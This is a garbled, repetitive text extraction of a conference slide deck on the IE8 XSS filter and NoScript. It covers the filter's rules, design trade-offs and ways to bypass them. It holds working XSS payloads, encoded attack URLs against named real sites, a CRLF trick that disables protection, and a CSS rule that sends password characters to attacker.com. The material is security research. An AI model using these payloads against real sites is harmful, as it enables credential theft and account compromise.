http://blogs.technet.com/srd/archive/2008/08/19/ie-8-xss-filter-architecture-implementation.aspx
http://blogs.msdn.com/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspx

Examining the IE8 XSS Filter by kuza55

XSS Filterhttp://blogs.technet.com/srd/archive/2008/08/19/ie-8-xss-filter-architecture-implementation.aspxhttp://blogs.msdn.com/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspxExamining the IE8 XSS Filter by kuza55 (OWASP Australia)

(OWASP Australia)


Слайд 68 It should be compatible.

It should be secure. 

It

It should be compatible.It should be secure.  It should be performant.The

should be performant.
The 3 commandments of the IE filter


Слайд 69
 
 
 
 
 
 
 
 
 
 
If its not compatible, users will turn it

          If its not compatible, users will turn it off.If its not

off.
If its not performant, users will turn it off.
Compatibility

> Security > Performance

Слайд 70 HTTP/1.0 200 OK Cache-Control: private, max-age=0 Date: Sun, 11

HTTP/1.0 200 OK Cache-Control: private, max-age=0 Date: Sun, 11 Jul

Jul 2010 01:23:45 GMT Content-Type: text/html; charset=ISO Set-Cookie: ASDF=123 Server: Apache X-XSS-Protection: 0






If its not compatible, admins will turn it off.
If its not performant, admins will turn it off.

Performance + Compatibility


Слайд 71 The filter will protect against the Top 3

The filter will protect against the Top 3 Reflected XSS vectors:

Reflected XSS vectors:  

$injection 

var a = “$injection”; 
What does

this mean?

Слайд 72 The rules
If you want to see them:
C:\>findstr /C:"sc{r}"

The rulesIf you want to see them:C:\>findstr /C:

\WINDOWS\SYSTEM32\mshtml.dll|find "{"


{.*?((@[i\\])|(([:=]|(&[#()=]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()=]x?0*((40)|(28)|(92)|(5C));?))))}
{[ /+\t\"\'`]st{y}le[ /+\t]*?=.*?([:=]|(&[#()=]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()=]x?0*((40)|(28)|(92)|(5C));?))}
{

+\t]*?=.}
{{{{<\?im{p}ort[ /+\t].*?implementation[ /+\t]*=}
{{[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.}
{<.*[:]vmlf{r}ame.*?[ /+\t]*?src[ /+\t]*=}
{<[i]?f{r}ame.*?[ /+\t]*?src[ /+\t]*=}
{]}
{}
{{}
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(((l|(\\u006C))(o|(\\u006F))(c|(\\u0063))(a|(\\u0061))(t|(\\u0074))(i|(\\u0069))(o|(\\u006F))(n|(\\u006E)))|((n|(\\u006E))(a|(\\u0061))(m|(\\u006D))(e|(\\u0065)))).*?{=}}
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?(([.].+?)|([\[].*?[\]].*?)){=}}
{[\"\'].*?{\)}[ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}}
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}.*?{\)}}

Слайд 73 Request
?var=
Rule matched:
{}
Response Source Code

Final Source Code

The rules

Request?var= Rule matched:{} Response Source Code Final Source CodeThe rules

Слайд 74 We will show the remaining 7 of our..

Top

We will show the remaining 7 of our..Top 10 reflected XSS

10 reflected XSS attacks and how you can attack

with them.


Bypassing the Filter


Слайд 75 Fragmented ?url='%20x=`&name=`%20onmouseover='alert(1)
 


 
DOM

Fragmented ?url='%20x=`&name=`%20onmouseover='alert(1)   DOM based /index.php/alert(1)/ document.write(

based /index.php/alert(1)/

document.write("");
 
Inside event attributes ?id=alert(1)

onclick="deleteTopic($id)">

Unfiltered Vectors – Top 4,5,6


Слайд 76 Reflected XSS means that the matched attack has

Reflected XSS means that the matched attack has to be present

to be present in the HTML source code.


Strings that

were modified in the backend


Attacks abusing charset peculiarities
Unicode Stuff Already Mentioned!


Attacks that are not reflected in the same page
https://www.dev.java.net/servlets/Search?mode=1&resultsPerPage=%22%27%2F%3E%3Cscript%3Ealert%28'Props+To+TheRat'%29%3C%2Fscript%3E&query=3&scope=domain&artifact=2&Button=Search

Props to ‘The Rat’ for finding the XSS on dev.java.net

Unfiltered Vectors – Top 7,8,9


Слайд 77 Attacks that are made to content not loaded

Attacks that are made to content not loaded as HTML Attack

as HTML






Attack in 2 steps.

Demo fail

– Router bricked 

Unfiltered Vectors – Top 10


Слайд 78 Using CSS-only attacks

input[type=password][value^=a]{
background:"//attacker.com/log.php?hash[]=a";
}
input[type=password][value^=b]{
background:"//attacker.com/log.php?hash[]=b";
}…





Several XSS attacks are

Using CSS-only attacksinput[type=password][value^=a]{background:

possible with just CSS and HTML, check: “The Sexy

Assassin” http://p42.us/css


Слайд 79

RECEIVES ALL THE HTML CODE UNTILL THE QUOTE
Unclosed Quote


Слайд 80

THE HTML CODE UNTILL THE QUOTE
Unclosed Quote


Слайд 81
Intranet

Same Origin



Other Exceptions

Intranet Same OriginOther Exceptions

Слайд 82 Allowed by the filter:
clickme
So this wont be

Allowed by the filter:clickmeSo this wont be detected (clickjacking):linkDemohttp://search.cnn.com/search?query=aaa&currentPage=2&nt=%22%3E%3Ca%20href%3D%22%3Fquery%3Daaa%26currentPage%3D2%26nt%3D%2522%253E%253C%2573crip%2574%253E%2561lert%2528%2527Props%2520To%2520The%2520Rat%2527%2529%253C/%2573crip%2574%253E%22%3E%3Cimg%20style%3D%22cursor%3Aarrow%3Bheight%3A200%25%3Bwidth%3A200%25%3Bposition%3Aabsolute%3Btop%3A-10px%3Bleft%3A-10px%3Bbackground-image%3Atransparent%22%20border%3D0/%3E%3C/a%3EProps to cesar

detected (clickjacking):
link

Demo
http://search.cnn.com/search?query=aaa¤tPage=2&nt=%22%3E%3Ca%20href%3D%22%3Fquery%3Daaa%26currentPage%3D2%26nt%3D%2522%253E%253C%2573crip%2574%253E%2561lert%2528%2527Props%2520To%2520The%2520Rat%2527%2529%253C/%2573crip%2574%253E%22%3E%3Cimg%20style%3D%22cursor%3Aarrow%3Bheight%3A200%25%3Bwidth%3A200%25%3Bposition%3Aabsolute%3Btop%3A-10px%3Bleft%3A-10px%3Bbackground-image%3Atransparent%22%20border%3D0/%3E%3C/a%3E
Props to cesar cerrudo and kuza55
Props to

“The Rat” for the XSS on cnn.com

Same Origin Exception + Clickjacking


Слайд 83 CRLF Injection:

header(“Location: ”.$_GET[‘redir’]);

redir=“\nX-XSS-Protection:+0\n\n

CRLF Injection:header(“Location: ”.$_GET[‘redir’]);redir=“\nX-XSS-Protection:+0\n\n

Слайд 84 IE8 Blocks JS by disabling:
=
(
)

BUT It is possible

IE8 Blocks JS by disabling:=()BUT It is possible to execute code

to execute code without () and =
{valueOf:location,toString:[].join,0:name,length:1}


We are limited

to attacks inside JS strings like:

urchinTracker("//newOrder");
loginPage=“”;


Some JSON parsers passing a “sanitized” string to eval() may also be vulnerable to this same bypass.

Bypassing the JavaScript based Filter


Слайд 85 Other possible bypasses?

Require a certain context.
 
new voteForObama; //

Other possible bypasses?Require a certain context. new voteForObama; // executes any user-function

executes any user-function without ( )

“:(location=name) // is not

detected (ternary operator // object literal)

“?name:”// is not detected, modify string value, relevant on cases like:
location=“/redir?story=”;

“&&name// props to kuza55

“;(unescape=eval); // redeclare functions 
Also props to kuza55!

JavaScript based Bypass


Слайд 86 Disabling scripts

Original code:
if(top!=self)top.location=location

Request:
?foobar=if


After filter:
if(top!=self)top.location=location


Demo! With.. Any webpage
Attacking with

Disabling scriptsOriginal code:if(top!=self)top.location=locationRequest:?foobar=ifAfter filter:if(top!=self)top.location=locationDemo! With.. Any webpageAttacking with the XSS Filter

the XSS Filter


Слайд 87 Attacking content-aware filters

Original code:
continueURI=“/login2.jsp?friend=”;

Request:
?foobar=continueURI

After filter:
continueURI=“/login2.jsp?friend=

Attacking content-aware filtersOriginal code: 	continueURI=“/login2.jsp?friend=”; Request:?foobar=continueURIAfter filter: 	continueURI=“/login2.jsp?friend=”; Attacking with the XSS Filter

onerror=alert(1)>”;

Attacking with the XSS Filter


Слайд 88 Why don't you detect fragmented attacks?
Performance, the

Why don't you detect fragmented attacks? Performance, the amount of permutations

amount of permutations of each argument and possible vector

is of O(n!), that means that with 10 arguments you need 3628800 operations, and an attacker could just send thousands of arguments to DoS the filter, also this is not as common as other attacks.
 
Why don't you detect DOM based attacks?
Compatibility (JSON probably) and Performance (hook all JS functions will slow IE even more.. if that's even possible), but it may be possible in the future.
 
Why don't you detect non-JS attacks like ?
Compatibility some websites are vulnerable to XSS by the way they work, and they need to use this elements.

Q&A with M$


Слайд 89 Why don't you detect attacks to Intranet?
The

Why don't you detect attacks to Intranet? The Intranet zone pretty

Intranet zone pretty much by definition is a managed

environment, unlike the Internet.  That means admins can set group policy to enable the filter in the Local Intranet zone, and also Intranet is only enabled by default on computers that are joined to a domain. -- David Ross

If IE is protecting me against XSS, should I disable all anti-reflected-XSS protections I have?

YES Of course! please do it.

Q&A with M$ / continued


Слайд 90 Firefox -> Never! They have CSP and they

Firefox -> Never! They have CSP and they think that's all

think that's all they need.
 
Firefox + NoScript -> Going

on a couple of years now!

Opera, Safari -> No idea!

Chrome -> Maybe!


XSS Filters in Other Browsers?


Слайд 91 NoScript
http://noscript.net/

NoScripthttp://noscript.net/

Слайд 92 NoScript Advantages
Their users.

Security over usability (still very usable!).

Updates

NoScript AdvantagesTheir users.Security over usability (still very usable!).Updates every week/2 weeks.Is NOT just a XSS filter.

every week/2 weeks.

Is NOT just a XSS filter.


Слайд 93 As any other filter, it's still possible to

As any other filter, it's still possible to bypass NoScript's rules,

bypass NoScript's rules, the following attack bypassed NoScript's rules:

z=“&”x=& onmousemove=t=Object(window.name); ({$:#0=t,z:eval(String(#0#).replace(/@/g,’’))}).z//>
  

This was fixed last week, have you updated noscript?:
http://tinyurl.com/m4nfs9

Bypassing the Filter's Rules


Слайд 94 find a bypass 10 minutes before the talk!

if

find a bypass 10 minutes before the talk!if I can't.. then..

I can't.. then.. it doesnt matter haha if I

can, notify giorgio haha

<>

This hasn't been fixed! Found 10m ago


Слайд 95 The DoS and pwn on NoScript (for bypassing)
 
The

The DoS and pwn on NoScript (for bypassing) The following example: http://victim.com/xss.php?hello=a-very-long-and-complicated-js-string&html_xss=alert

following example:
http://victim.com/xss.php?hello=a-very-long-and-complicated-js-string&html_xss=alert ("pwned");

Will DoS NoScript, and then firefox will

kill it, and then your victim will be redirected to your "pwned" webpage.

Hacking the Filter


Слайд 96 NoScript wont protect websites from attacking themselves, so

NoScript wont protect websites from attacking themselves, so frames pointing to

frames pointing to a redirect that sends to the

payload wont be detected by NoScript:

Example: http://tinyurl.com/l5rnyc

http://www.google.com/imgres?imgurl=http://tinyurl.com/ZWZ8Z4&imgrefurl=http://tinyurl.com/ZWZ8Z4
 
and http://tinyurl.com/ZWZ8Z4 redirects to

https://www.google.com/adsense/g-app-single-1.do?websiteInfoInput.uri=ZWZ8Z4&contactInput.asciiNameInput.fullName=
  • Имя файла: our-favorite-xss-filtersids-and-how-to-attack-them.pptx
  • Количество просмотров: 136
  • Количество скачиваний: 0